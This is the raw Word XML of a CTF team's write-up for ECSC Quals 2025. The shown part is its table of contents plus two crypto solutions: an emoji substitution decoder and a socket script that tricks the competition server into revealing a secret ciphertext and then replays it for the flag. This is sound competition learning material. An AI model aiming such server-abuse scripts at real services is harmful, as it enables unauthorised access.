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29A1" w14:textId="6C41CD39" w:rsidR="005838A0" w:rsidRPr="005838A0" w:rsidRDefault="005838A0" w:rsidP="005838A0">
      <w:pPr>
        <w:jc w:val="center"/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</w:pPr>
      <w:r w:rsidRPr="005838A0">
        <w:rPr>
          <w:rFonts w:ascii="Agency FB" w:hAnsi="Agency FB"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
          <w:color w:val="00B0F0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E468574" wp14:editId="2E079E8C">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>1202267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608320121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0121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38A0">
        <w:rPr>
          <w:rFonts w:ascii="Agency FB" w:hAnsi="Agency FB"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
          <w:color w:val="00B0F0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8F2685B" wp14:editId="2F1BCE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1084727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4727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8A0"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  <w:t>1C3GH3TT0 – JUKE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="136C9B60" w14:textId="2B77BC67" w:rsidR="005838A0" w:rsidRDefault="005838A0" w:rsidP="005838A0">
      <w:pPr>
        <w:jc w:val="center"/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</w:pPr>
      <w:r w:rsidRPr="005838A0"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  <w:t>WRITEUPS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03990538" w14:textId="77777777" w:rsidR="005838A0" w:rsidRPr="00BC5416" w:rsidRDefault="005838A0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A8F7328" w14:textId="06F641AB" w:rsidR="005838A0" w:rsidRPr="00960686" w:rsidRDefault="005838A0" w:rsidP="005838A0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005838A0">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ECSC QUALS 2025</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B9B5C0E" w14:textId="77777777" w:rsidR="00A96003" w:rsidRDefault="00A96003" w:rsidP="005838A0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F0672A9" w14:textId="60E9CE0A" w:rsidR="00A96003" w:rsidRPr="00960686" w:rsidRDefault="009A53A7" w:rsidP="005838A0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009A53A7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="049236F8" wp14:editId="357084F2">
            <wp:extent cx="3905795" cy="3038899"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="141905956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9561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D1C" w14:textId="77777777" w:rsidR="0018145A" w:rsidRPr="00BC5416" w:rsidRDefault="0018145A" w:rsidP="005838A0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas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1615629341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  <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:sdtEndPr>
      <w:sdtContent>
        <w:p w14:paraId="7ABB6483" w14:textId="08F8F4C6" w:rsidR="0018145A" w:rsidRDefault="002A437D" w:rsidP="00A513EE">
          <w:pPr>
            <w:pStyle w:val="TOCHeading"/>
            <w:rPr>
              <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
              <w:lang w:val="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="002A437D">
            <w:rPr>
              <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
              <w:lang w:val="en-GB"/>
            </w:rPr>
            <w:t>Categories</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="262B2A7B" w14:textId="77777777" w:rsidR="00A513EE" w:rsidRPr="00A513EE" w:rsidRDefault="00A513EE" w:rsidP="00A513EE">
          <w:pPr>
            <w:rPr>
              <w:lang w:val="en-GB" w:eastAsia="el-GR"/>
            </w:rPr>
          </w:pPr>
        </w:p>
        <w:p w14:paraId="5B097560" w14:textId="3AACE6C1" w:rsidR="00086989" w:rsidRPr="00086989" w:rsidRDefault="002A437D">
          <w:pPr>
            <w:pStyle w:val="TOC1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r w:rsidRPr="00086989">
            <w:rPr>
              <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
            </w:rPr>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidRPr="00086989">
            <w:rPr>
              <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
              <w:lang w:val="en-US"/>
            </w:rPr>
            <w:instrText xml:space="preserve"> TOC \o "1-3" \h \z \u </w:instrText>
          </w:r>
          <w:r w:rsidRPr="00086989">
            <w:rPr>
              <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:hyperlink w:anchor="_Toc203244048" w:history="1">
            <w:r w:rsidR="00086989" w:rsidRPr="00086989">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Crypto</w:t>
            </w:r>
            <w:r w:rsidR="00086989" w:rsidRPr="00086989">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00086989"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="00086989" w:rsidRPr="00086989">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc203244048 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00086989" w:rsidRPr="00086989">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00086989"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</w:t>
            </w:r>
            <w:r w:rsidR="00086989"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4E8DB2A" w14:textId="0C430BC6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49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The Truth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_Toc203244049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42C9454" w14:textId="1A491757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0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This is different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_Toc203244050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4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D432B96" w14:textId="0B64FD50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1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Gamble Auction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_Toc203244051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7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4EC07DD" w14:textId="5F927439" w:rsidR="00086989" w:rsidRPr="00086989" w:rsidRDefault="00086989">
          <w:pPr>
            <w:pStyle w:val="TOC1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2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Forensics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_Toc203244052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13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DF67231" w14:textId="53DEDA5A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3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Volatile Expert Pt. 1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_Toc203244053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13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2879187" w14:textId="625C2D35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4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Volatile Expert Pt. 2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_Toc203244054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13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5E6A5B6" w14:textId="66BC6BD2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5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Volatile Expert Pt. 3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_Toc203244055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13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C6FFD66" w14:textId="2DF22F5A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6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Volatile Expert Pt. 4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_Toc203244056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14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F591A6D" w14:textId="4BD22FA4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7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Volatile Expert Pt. 5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_Toc203244057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14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857C8C7" w14:textId="4D32A84F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8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Volatile Expert Pt. 6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_Toc203244058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14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ABE3376" w14:textId="771E8247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59" w:history="1">
            <w:r w:rsidRPr="00086989">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Hive Heist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_Toc203244059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15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C92668" w14:textId="7E2045DE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0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HexCell Hunt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_Toc203244060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15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8D35D64" w14:textId="2EBFF97E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1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Cursed Locker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_Toc203244061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15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FB297AD" w14:textId="5FA403BC" w:rsidR="00086989" w:rsidRPr="00086989" w:rsidRDefault="00086989">
          <w:pPr>
            <w:pStyle w:val="TOC1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2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Misc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_Toc203244062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17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171933A" w14:textId="7D615C49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3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CalculAItor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_Toc203244063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17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D29E792" w14:textId="75CCA30E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4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Date MCP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_Toc203244064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17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BA59B2B" w14:textId="58844449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5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Holding Secrets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_Toc203244065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18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B3E6CE7" w14:textId="5FF5DC7E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6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Pot Pouri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_Toc203244066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20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4E4C12B" w14:textId="2E443CC8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7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High-Low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_Toc203244067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25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6D37426" w14:textId="4ABF5692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8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Blackjack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_Toc203244068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26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91BB45D" w14:textId="3A856865" w:rsidR="00086989" w:rsidRPr="00086989" w:rsidRDefault="00086989">
          <w:pPr>
            <w:pStyle w:val="TOC1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69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Pwn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_Toc203244069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33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6E33678" w14:textId="2303F50C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0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Log Recorder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_Toc203244070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33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5AD558A" w14:textId="4EAB7C5B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1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Station Maintenace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_Toc203244071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34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5B74E9A" w14:textId="488B8D04" w:rsidR="00086989" w:rsidRPr="00086989" w:rsidRDefault="00086989">
          <w:pPr>
            <w:pStyle w:val="TOC1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2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Reverse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_Toc203244072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35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4F17A6" w14:textId="1D3350DF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3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Anti-tricks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_Toc203244073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35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94B33DD" w14:textId="5246C7BD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4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Just a Key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_Toc203244074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35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5118916" w14:textId="684584BD" w:rsidR="00086989" w:rsidRPr="00086989" w:rsidRDefault="00086989">
          <w:pPr>
            <w:pStyle w:val="TOC1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5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Web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_Toc203244075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39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CC50F18" w14:textId="4809707B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6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Memes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_Toc203244076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39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EE10075" w14:textId="3301AA70" w:rsidR="00086989" w:rsidRPr="00086989" w:rsidRDefault="00086989">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Consolas"/>
              <w:noProof/>
              <w:lang w:eastAsia="el-GR"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc203244077" w:history="1">
            <w:r w:rsidRPr="00086989">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>The Missing Essence</w:t>
            </w:r>
            <w:r w:rsidRPr="00086989">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00086989">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidRPr="00086989">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc203244077 \h </w:instrText>
            </w:r>
            <w:r w:rsidRPr="00086989">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidRPr="00086989">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00960686">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>39</w:t>
            </w:r>
            <w:r w:rsidRPr="00086989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A0C1D9" w14:textId="78DB6257" w:rsidR="002A437D" w:rsidRPr="00A513EE" w:rsidRDefault="002A437D">
          <w:pPr>
            <w:rPr>
              <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
              <w:lang w:val="en-US"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="00086989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625DBF" w14:textId="77777777" w:rsidR="005838A0" w:rsidRDefault="005838A0" w:rsidP="005838A0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C8BD6B8" w14:textId="77777777" w:rsidR="0018145A" w:rsidRDefault="0018145A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1D07A73C" w14:textId="49A76111" w:rsidR="0018145A" w:rsidRDefault="002A437D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0" w:name="_Toc203244048"/>
      <w:r w:rsidRPr="00C05876">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Crypto</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="7A311536" w14:textId="77777777" w:rsidR="00420F0D" w:rsidRPr="00420F0D" w:rsidRDefault="00420F0D" w:rsidP="00420F0D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5EAE2668" w14:textId="4F5D431A" w:rsidR="00C05876" w:rsidRDefault="00C05876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" w:name="_Toc203244049"/>
      <w:r w:rsidRPr="0018145A">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The Truth</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p w14:paraId="58D9F59E" w14:textId="712C2013" w:rsidR="00E20286" w:rsidRPr="00420F0D" w:rsidRDefault="00E20286" w:rsidP="00E20286">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00420F0D">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Started with the known part of the flag “ECSC” and replaced all the references. Keep guessing some words until it makes sense and finally:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FB58142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1. </w:t>
      </w:r>
      <w:r w:rsidRPr="00E20286">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="880000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t># Emoji to letter mapping</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="012CABE7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2. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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emoji_map</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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29CB781D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3.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Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:color w:val="008800"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>👽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"E"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7DCBB70A" w14:textId="469CBDD8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4.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🎸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"C"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0B3A036B" w14:textId="6D4114CD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5.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💀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"S"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4BA1D6A5" w14:textId="2ECF9A0B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6.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💯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"T"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1AB44951" w14:textId="3A64F8CC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7.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🥁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"H"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116D65F2" w14:textId="7839C616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8.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🎭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"R"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2CECAD43" w14:textId="7D76BFD8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 9.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🚀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"U"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0EBFAD99" w14:textId="31B932FB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10.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🕺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"P"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A737A48" w14:textId="0A7D1FD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11.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🙄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"K"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B2702BB" w14:textId="737EE212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12.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🎵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"W"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2A0B353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13.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Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:color w:val="008800"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>😴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"A"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7A0C4680" w14:textId="64288CD6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14.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🎤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"Q"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43F9840D" w14:textId="7339521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15.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🤠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"N"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64BC1C2" w14:textId="00D96491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16.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😂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"O"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335523EB" w14:textId="65857121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17.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🤗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"Y"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44FAC2F" w14:textId="3A547CAA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18.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💥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"B"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F8D81A8" w14:textId="5AF4C696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19.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🔮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"D"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2B3EA2A" w14:textId="65C0A99D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20.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😎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"L"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B2B28D2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21.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Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:color w:val="008800"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>🎯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"I"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21C9D8C8" w14:textId="26223F29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22.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🥳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"F"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78E37FD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23.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Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:color w:val="008800"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>👻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"V"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0606BBC2" w14:textId="3BB25B61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24.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="00BC5416" w:rsidRPr="00BC5416">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:color w:val="008800"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>😏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"M"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4B5DA298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25. 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623385FF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26.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DA86D3D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27. </w:t>
      </w:r>
      <w:r w:rsidRPr="00E20286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Encrypted </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E20286">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="880000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>message</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00E20286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(copy your full emoji message here)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A0EE746" w14:textId="58977E15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color w:val="008800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28. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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encrypted_message</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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'''</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="008800"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;emoji output here&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00E20286">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="008800"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>'''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48CB3887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48.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744738D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49. </w:t>
      </w:r>
      <w:r w:rsidRPr="00E20286">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="880000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t># Replace emojis with corresponding letters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5811C043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50. </w:t>
      </w:r>
      <w:r w:rsidRPr="00E2028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emoji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letter </w:t>
      </w:r>
      <w:r w:rsidRPr="00E2028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emoji_map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items</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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3C09B497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51.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encrypted_message</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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encrypted_message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replace</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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emoji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letter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B61CE0F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52. </w:t>
      </w:r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22B010C" w14:textId="77777777" w:rsidR="00E20286" w:rsidRP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53. </w:t>
      </w:r>
      <w:r w:rsidRPr="00E20286">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="880000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t># Print the decrypted (partially) message</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D9A1811" w14:textId="36194FE1" w:rsidR="00E20286" w:rsidRDefault="00E20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926228"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E20286">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">54. </w:t>
      </w:r>
      <w:r w:rsidRPr="00E2028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E20286">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>encrypted_message</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E2028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744E878" w14:textId="77777777" w:rsidR="00420F0D" w:rsidRDefault="00420F0D" w:rsidP="00420F0D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US" w:eastAsia="el-GR"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B8D25E4" w14:textId="0ABB1A93" w:rsidR="00420F0D" w:rsidRDefault="00420F0D" w:rsidP="00420F0D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="el-GR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00420F0D">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US" w:eastAsia="el-GR"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="731BC05B" wp14:editId="0E26C24B">
            <wp:extent cx="5274310" cy="2915920"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="11424662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6622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07D" w14:textId="77777777" w:rsidR="00420F0D" w:rsidRPr="00420F0D" w:rsidRDefault="00420F0D" w:rsidP="00420F0D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="el-GR"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A31E6B4" w14:textId="46F74155" w:rsidR="0018145A" w:rsidRDefault="0018145A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" w:name="_Toc203244050"/>
      <w:r w:rsidRPr="0018145A">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>This is different</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p w14:paraId="74AAEA03" w14:textId="369A24F5" w:rsidR="001C5997" w:rsidRDefault="001C5997" w:rsidP="001C5997">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Solve script:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C5DCA3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1.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#!/usr/bin/env python3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25242E66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socket</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7814C74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time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="502E194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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="138BB57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1BCA04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6.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solve_challenge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6C5E3AD4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"""Solve the challenge by exploiting the server's behavior"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7603D24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host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challenge.hackthat.site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</w:p>
    <w:p w14:paraId="0BA699A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port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56892</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1160730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C28CC1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"Connecting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to {host}:{port}"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429BF2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50973B9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4D61CC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AF_INET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SOCK_STREAM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51B8B2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connect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host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port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7CB58D0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BF1865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BBC78D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Read initial </w:t>
      </w:r>
      <w:proofErr w:type="gram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banner</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="687404B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0.5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5E637C0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initial_data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4096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BF594F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"Initial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banner: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initial_data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760CE3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27D462A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The key insight: we need to make the server show us the </w:t>
      </w:r>
      <w:proofErr w:type="spell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magic_ct</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="19D8B95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and then immediately provide it back in the same connection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A4B2C4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20EF5CD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Method: Use a timing/buffer approach to read all the server output</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19C8856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"Sending option 2..."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CB2CB8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'2\n'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238128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29.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C2C90C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30.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4B9F44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Read the prompt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CDE5D6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prompt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1024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9B1348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"Server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prompt: {prompt}"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E399E5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137BAA3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Send wrong input first to see the </w:t>
      </w:r>
      <w:proofErr w:type="spell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magic_ct</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0A3E1EE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"Sending wrong input to reveal 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..."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C3467B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'wrong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\n'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17BFBF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0.3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C7D67A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11FE4B5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Read the response which should contain the </w:t>
      </w:r>
      <w:proofErr w:type="spell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magic_ct</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="639DCC2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response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</w:p>
    <w:p w14:paraId="37ADFC2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8AFA4B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54F931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chunk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1024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8CACE8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response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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="676287A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response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500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9FA233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1C26259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timeout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E7CCA3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pass</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1465F726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26C7209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"Response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after wrong input: {response}"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039BB50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01D3B4F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Extract the </w:t>
      </w:r>
      <w:proofErr w:type="spell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(should be 32 hex chars)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31D25DD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hex_matches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findall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'[0-9a-fA-F]{32}'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response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E65FEF4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9F2DA4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54AD2844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match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hex_matches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1EE9B50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match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'wrong'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Skip our input</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09C9010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match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lower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7F39A03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60C4580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7724D6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711279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"Could not find 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!"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82983C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Try shorter hex strings</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BB1700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hex_matches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findall</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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'[0-9a-fA-F]{16,}'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response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123138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"All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hex strings found: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hex_matches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9B2211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hex_matches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1ABC4B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hex_matches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].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lower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65A6B97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826A09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CEB92D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"Failed to extract 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46C9DE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</w:p>
    <w:p w14:paraId="15F2FE1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260B6BC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"Found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F32E24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7E1F729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Check if we can still interact with this connection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="177CF36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The server might have closed after wrong input</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F92DF1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084FD9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Try to send option 2 again</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7901AFA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'2\n'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0BD323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53BAAC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next_prompt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1024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D12EBA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"Next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prompt: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next_prompt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9E8612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22E4FBE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Send the correct </w:t>
      </w:r>
      <w:proofErr w:type="spell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magic_ct</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="45A1813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"Sending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correct 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FE8390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87.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magic_ct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encode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'\n'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AE0DE5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0.5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FBF9CA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89.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04E9B11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Read final response</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="143AE9C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final_response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</w:p>
    <w:p w14:paraId="3327B39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5216D18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E62DEE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chunk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1024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20E0BB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final_response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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FE3AC5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'ECSC{'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final_response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C56749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97. </w:t>
      </w:r>
      <w:proofErr w:type="gram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  <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="1BC4BF6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timeout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5EF520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pass</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="292B4D5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7D43825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"Final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response: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final_response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1EBF4C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7419964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Look for the flag</w:t>
      </w:r>
    </w:p>
